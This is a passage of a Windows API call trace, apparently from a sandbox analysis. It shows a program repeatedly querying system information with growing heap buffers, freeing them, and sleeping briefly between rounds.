[0239.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.317] Sleep (dwMilliseconds=0x110) [0239.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.329] Sleep (dwMilliseconds=0x110) [0239.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.350] Sleep (dwMilliseconds=0x110) [0239.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.364] Sleep (dwMilliseconds=0x110) [0239.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.379] Sleep (dwMilliseconds=0x110) [0239.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.391] Sleep (dwMilliseconds=0x110) [0239.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.411] Sleep (dwMilliseconds=0x110) [0239.430] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.430] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.438] Sleep (dwMilliseconds=0x110) [0239.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.457] Sleep (dwMilliseconds=0x110) [0239.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.475] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.480] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.481] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.483] Sleep (dwMilliseconds=0x110) [0239.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.505] Sleep (dwMilliseconds=0x110) [0239.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.520] Sleep (dwMilliseconds=0x110) [0239.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.532] Sleep (dwMilliseconds=0x110) [0239.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0239.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0239.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0239.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0239.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0239.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0239.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0239.552] Sleep (dwMilliseconds=0x110) [0239.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0239.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 